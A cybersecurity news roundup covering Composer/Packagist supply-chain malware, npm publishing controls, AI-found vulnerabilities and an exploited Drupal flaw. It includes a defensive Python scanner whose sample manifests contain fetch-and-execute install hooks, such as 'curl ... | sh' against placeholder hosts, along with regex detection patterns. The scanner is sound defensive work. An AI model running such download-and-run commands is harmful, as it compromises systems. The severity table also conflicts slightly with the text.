CyberNews: 24/05/2026 Edition
Today’s roundup
Summary
A supply chain attack targeted Laravel Lang localization packages, leveraging GitHub version tags to distribute credential-stealing malware through Composer. This campaign highlights the ongoing risks associated with third-party software dependencies and the need for rigorous supply chain security practices.
GitHub has enhanced npm's security with new controls, including "staged publishing," which requires maintainers to pass a two-factor authentication (2FA) challenge before a package release becomes publicly available. This aims to bolster software supply chain integrity by adding an extra layer of verification for package updates.
A coordinated supply chain attack has infected eight packages on Packagist, using malicious code to download and execute a Linux binary hosted on GitHub Releases. The attackers inserted the malicious code into `package.json` files within Composer packages, primarily targeting JavaScript-based projects.
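The install-hook pattern described in the Packagist and Laravel Lang items above (a lifecycle script that fetches a binary from GitHub Releases and runs it) is something a defender can screen for before `composer install` or `npm install` executes anything. The script below is an added example written for this roundup, not code from any of the projects or vendors named in it. It parses a manifest's `scripts` section, looks for the common npm and Composer install-time hooks, and flags a hook when at least two independent indicators coincide: a download tool, a GitHub Releases asset URL, or a step that executes what was fetched. The hook list, the indicator regexes and the sample manifests (including every URL in them) are constructed assumptions for illustration, not observed indicators from the campaign.

```python
"""
Heuristic scan of package manifests (npm package.json / Composer composer.json)
for install-time hooks that fetch and run remote content.
Added example for this roundup, not code from any project named in it.
Sample manifests are constructed; every URL below is a placeholder.
"""
import json
import re
from typing import Dict, List, Union

# Hooks that run automatically during install/update (assumption: this list
# covers the common npm and Composer lifecycle events, not every one).
NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
COMPOSER_HOOKS = {
    "pre-install-cmd", "post-install-cmd", "pre-update-cmd", "post-update-cmd",
    "pre-autoload-dump", "post-autoload-dump", "post-root-package-install",
    "post-create-project-cmd",
}
INSTALL_HOOKS = NPM_HOOKS | COMPOSER_HOOKS

# Indicator patterns (assumptions chosen for this example).
DOWNLOADS = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I)
RELEASE_ASSET = re.compile(r"github\.com/[^\s/]+/[^\s/]+/releases/download/", re.I)
EXECUTES = re.compile(
    r"(\|\s*(sh|bash|zsh|python[23]?)\b|chmod\s+\+x|\bnode\s+-e\b|\beval\b|/tmp/\S+\s*$)",
    re.I,
)


def _commands(value: Union[str, list]) -> List[str]:
    """Composer hooks may be a list of commands; npm hooks are one string."""
    if isinstance(value, str):
        return [value]
    if isinstance(value, list):
        return [v for v in value if isinstance(v, str)]
    return []


def find_risky_hooks(manifest: Dict) -> List[Dict]:
    """Return install-time hooks whose commands show at least two indicators."""
    findings = []
    for name, value in (manifest.get("scripts") or {}).items():
        if name not in INSTALL_HOOKS:
            continue
        cmds = _commands(value)
        joined = " && ".join(cmds)  # evaluate the hook's commands as one unit
        reasons = []
        if DOWNLOADS.search(joined):
            reasons.append("downloads remote content")
        if RELEASE_ASSET.search(joined):
            reasons.append("references a GitHub Releases asset")
        if EXECUTES.search(joined):
            reasons.append("executes the fetched content")
        if len(reasons) >= 2:
            findings.append({"hook": name, "commands": cmds, "reasons": reasons})
    return findings


def scan_manifest_text(text: str) -> List[Dict]:
    """Parse a manifest from its JSON text and scan it."""
    return find_risky_hooks(json.loads(text))


# Constructed samples: a Composer package with a download-and-run hook,
# an npm package with a piped installer, and a benign npm package.
SUSPICIOUS_COMPOSER = json.dumps({
    "name": "example-vendor/example-lang",
    "scripts": {"post-install-cmd": [
        "curl -sSL https://github.com/example-org/example-repo/releases/download/v1.0/agent -o /tmp/agent",
        "chmod +x /tmp/agent && /tmp/agent",
    ]},
})
SUSPICIOUS_NPM = json.dumps({
    "name": "example-pkg",
    "scripts": {"postinstall": "curl -s https://example.invalid/setup.sh | sh"},
})
BENIGN_NPM = json.dumps({
    "name": "example-pkg",
    "scripts": {"postinstall": "node scripts/build.js", "test": "jest"},
})

if __name__ == "__main__":
    samples = [("composer", SUSPICIOUS_COMPOSER), ("npm", SUSPICIOUS_NPM), ("benign", BENIGN_NPM)]
    for label, text in samples:
        for f in scan_manifest_text(text):
            print(f"[{label}] {f['hook']}: {', '.join(f['reasons'])}")
```

Run it against the `composer.json` and `package.json` of every package in a lockfile before the hooks are allowed to execute; the two-indicator threshold keeps ordinary build steps (`node scripts/build.js`) out of the findings while still catching both the direct GitHub Releases fetch and the `curl | sh` variant. It is a heuristic, so treat a hit as a reason to inspect the package rather than proof of compromise, and pair it with installing under `--ignore-scripts` (npm) or `--no-scripts` (Composer) in CI.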
Anthropic's Project Glasswing, powered by its Claude Mythos Preview AI model, discovered over 10,000 high- or critical-severity vulnerability candidates across more than 1,000 open-source projects in one month. Following human validation, 1,094 exploitable flaws were confirmed, including a critical vulnerability (CVE-2026-5194, CVSS 9.1) in WolfSSL. The initiative underscores the increasing challenge of patching vulnerabilities at a pace that keeps up with AI-driven discovery.
Drupal's highly critical SQL injection vulnerability, CVE-2026-9082, affecting sites using PostgreSQL databases, is now under active exploitation. Within 48 hours of its May 20 patch release, Imperva detected over 15,000 exploitation attempts targeting nearly 6,000 sites across 65 countries, with significant focus on gaming and financial services. The flaw enables unauthenticated attackers to achieve information disclosure, privilege escalation, and potentially remote code execution, necessitating immediate patching for affected systems.
Vulnerabilities
| CVE | Severity |
| --- | --- |
| CVE-2026-9082 | High |
| CVE-2026-5194 | High |